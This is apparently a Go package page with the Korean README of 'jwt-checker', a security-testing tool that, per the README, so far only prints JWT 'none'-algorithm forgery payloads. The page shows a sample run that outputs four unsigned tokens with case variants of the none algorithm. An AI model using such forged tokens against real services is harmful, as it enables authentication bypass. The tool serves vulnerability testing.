module
0.0.0-20240409021942-b783b83baa62
Repository: https://github.com/ksw9722/jwt-checker.git
Documentation: pkg.go.dev
# README
jwt-checker
- jwt 변조 관련 보안 취약점을 간단하게 테스트하는 도구입니다. (ex: none 알고리즘, lfi, ssrf 등)
- 현재 none 알고리즘 페이로드를 생성하여 콘솔에 출력해주는 기능까지만 구현이 되었습니다. (추후에 동적으로 패킷 전송 및 정탐 판별까지 추가 예정)
사용 방법
go run ./cmd/jwt-checker/main.go -h
Usage of C:\Users\ksw97\AppData\Local\Temp\go-build2744319202\b001\exe\main.exe:
-m string
공격 타입 (default "none")
-t string
JWT 토큰 입력
ex) go run ./cmd/jwt-checker/main.go -m none -t <JWT 토큰>
실행 결과
go run .\cmd\jwt-checker\main.go -m none -t eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6Imd1ZXN0In0.OnuZnYMdetcg7AWGV6WURn8CFSfas6AQej4V9M13nsk
eyJhbGciOiJub25lIiwidHlwIjoiand0In0=.eyJ1c2VybmFtZSI6Imd1ZXN0In0=.
eyJhbGciOiJOb25lIiwidHlwIjoiand0In0=.eyJ1c2VybmFtZSI6Imd1ZXN0In0=.
eyJhbGciOiJOT05FIiwidHlwIjoiand0In0=.eyJ1c2VybmFtZSI6Imd1ZXN0In0=.
eyJhbGciOiJub05lIiwidHlwIjoiand0In0=.eyJ1c2VybmFtZSI6Imd1ZXN0In0=.